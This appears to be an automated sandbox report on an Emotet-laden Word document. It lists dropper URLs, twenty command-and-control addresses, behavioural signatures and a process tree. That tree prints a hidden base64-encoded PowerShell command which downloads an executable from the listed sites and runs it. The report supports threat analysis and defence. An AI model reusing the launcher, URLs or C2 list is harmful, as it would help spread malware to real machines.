Analysis

  • max time kernel
    29s
  • resource
    win10v191014
  • submitted
    14-01-2020 01:55

General

  • Target

    ca99f191c3ae6a2034d8370f23374146725012b89a87773d3675eb41a1176599

  • Sample

    200114-7rr59yjph2

  • SHA256

    ca99f191c3ae6a2034d8370f23374146725012b89a87773d3675eb41a1176599

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://www.opccmission.org/wp-includes/PRQWj892236/

exe.dropper

http://butterflyvfx.synergy-college.org/3fb7513/

exe.dropper

https://www.app48.cn/logreport/01416692/

exe.dropper

http://diek.nou.nl/app/gC4059/

exe.dropper

http://www.aiga.it/wp-admin/2Hf689/

Extracted

Family

emotet

C2

99.252.27.6:80

152.231.89.226:80

86.123.138.76:80

192.241.143.52:8080

159.65.241.220:8080

45.79.95.107:443

69.163.33.84:8080

37.187.6.63:8080

59.120.5.154:80

188.135.15.49:80

125.99.61.162:7080

120.150.247.164:80

189.19.81.181:443

190.210.236.139:80

190.17.44.48:80

142.93.114.137:8080

93.144.226.57:80

172.104.169.32:8080

178.79.163.131:8080

94.200.126.42:80

rsa_pubkey.plain

Signatures

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs
  • Executes dropped EXE 4 IoCs
  • Suspicious behavior: EmotetMutantsSpam 2 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Drops file in System32 directory 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ca99f191c3ae6a2034d8370f23374146725012b89a87773d3675eb41a1176599.doc" /o ""
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious use of SetWindowsHookEx
    PID:4976
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -w hidden -en JABLAHIAbQB3AG0AZQBuAHIAcgBhAGEAaAA9ACcAQgB0AHkAegBiAGsAZwBqAGQAJwA7ACQAUwBmAHAAYwBsAHAAZQB2AGkAdgBqACAAPQAgACcANgA1ADcAJwA7ACQASgBsAHMAaABoAG0AegBmAHEAeQB5AD0AJwBKAHkAeABhAGUAbwB1AHUAJwA7ACQAUABvAHAAZAB2AGYAegBiAHEAbABnAHAAbwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAUwBmAHAAYwBsAHAAZQB2AGkAdgBqACsAJwAuAGUAeABlACcAOwAkAEIAagB2AGgAdgBvAGEAbwA9ACcAWQB1AGIAeQBrAHMAbwBoAGwAcAAnADsAJABDAHcAdwBhAG4AawB5AGMAcABtAGEAPQAuACgAJwBuACcAKwAnAGUAdwAtAG8AYgBqACcAKwAnAGUAYwB0ACcAKQAgAE4ARQB0AC4AVwBFAEIAYwBsAEkARQBOAHQAOwAkAE4AZABjAGYAaABkAHcAbQBxAGcAPQAnAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBvAHAAYwBjAG0AaQBzAHMAaQBvAG4ALgBvAHIAZwAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAFAAUgBRAFcAagA4ADkAMgAyADMANgAvACoAaAB0AHQAcAA6AC8ALwBiAHUAdAB0AGUAcgBmAGwAeQB2AGYAeAAuAHMAeQBuAGUAcgBnAHkALQBjAG8AbABsAGUAZwBlAC4AbwByAGcALwAzAGYAYgA3ADUAMQAzAC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBhAHAAcAA0ADgALgBjAG4ALwBsAG8AZwByAGUAcABvAHIAdAAvADAAMQA0ADEANgA2ADkAMgAvACoAaAB0AHQAcAA6AC8ALwBkAGkAZQBrAC4AbgBvAHUALgBuAGwALwBhAHAAcAAvAGcAQwA0ADAANQA5AC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AYQBpAGcAYQAuAGkAdAAvAHcAcAAtAGEAZABtAGkAbgAvADIASABmADYAOAA5AC8AJwAuACIAUwBgAFAAbABpAFQAIgAoACcAKgAnACkAOwAkAE8AdwByAG0AagBpAHkAYwBxAHQAegBqAD0AJwBMAGUAZABxAHAAawBjAHkAZQBwAHcAeQBxACcAOwBmAG8AcgBlAGEAYwBoACgAJABGAG8AcAB3AHUAYwBpAGcAbgAgAGkAbgAgACQATgBkAGMAZgBoAGQAdwBtAHEAZwApAHsAdAByAHkAewAkAEMAdwB3AGEAbgBrAHkAYwBwAG0AYQAuACIAZABgAG8AYABXAG4ATABPAEEAZABmAGkAYABMAEUAIgAoACQARgBvAHAAdwB1AGMAaQBnAG4ALAAgACQAUABvAHAAZAB2AGYAegBiAHEAbABnAHAAbwApADsAJABOAGkAdQB6AGcAdQB5AHAAPQAnAFIAcAB0AHUAZQB1AHMAaABsACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQAUABvAHAAZAB2AGYAegBiAHEAbABnAHAAbwApAC4AIgBMAGAAZQBuAGAAZwB0AEgAIgAgAC0AZwBlACAAMgA1ADMANwA2ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAYABUAEEAUgB0ACIAKAAkAFAAbwBwAGQAdgBmAHoAYgBxAGwAZwBwAG8AKQA7ACQAVgB6AHMAcwBxAHMAYwBwAD0AJwBNAGMAZABsAGYAawBrAGUAbQBwAHYAawAnADsAYgByAGUAYQBrADsAJABKAGQAegB1AGUAcgBlAGUAcQBqAG4AdQBoAD0AJwBHAG4AcwB2AHoAYwByAHIAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASQB3AGgAdQB1AGkAawBjAHcAagBtAD0AJwBMAHMAbwBoAGwAdQB4AGsAZAAnAA==
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    PID:3712
    • C:\Users\Admin\657.exe
      "C:\Users\Admin\657.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      PID:4756
      • C:\Users\Admin\657.exe
        --67bc65d6
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EmotetMutantsSpam
        • Suspicious use of SetWindowsHookEx
        • Drops file in System32 directory
        PID:3864
  • C:\Windows\SysWOW64\methodsdispid.exe
    "C:\Windows\SysWOW64\methodsdispid.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Executes dropped EXE
    • Suspicious use of SetWindowsHookEx
    PID:4444
    • C:\Windows\SysWOW64\methodsdispid.exe
      --f4d1fd05
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EmotetMutantsSpam
      • Suspicious use of SetWindowsHookEx
      PID:4080

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/3864-11-0x0000000000400000-0x0000000000466000-memory.dmp

    Filesize

    408KB

  • memory/3864-10-0x0000000002010000-0x0000000002027000-memory.dmp

    Filesize

    92KB

  • memory/4080-16-0x0000000000D70000-0x0000000000D87000-memory.dmp

    Filesize

    92KB

  • memory/4080-17-0x0000000000400000-0x0000000000466000-memory.dmp

    Filesize

    408KB

  • memory/4444-13-0x0000000000D50000-0x0000000000D67000-memory.dmp

    Filesize

    92KB

  • memory/4756-7-0x0000000000740000-0x0000000000757000-memory.dmp

    Filesize

    92KB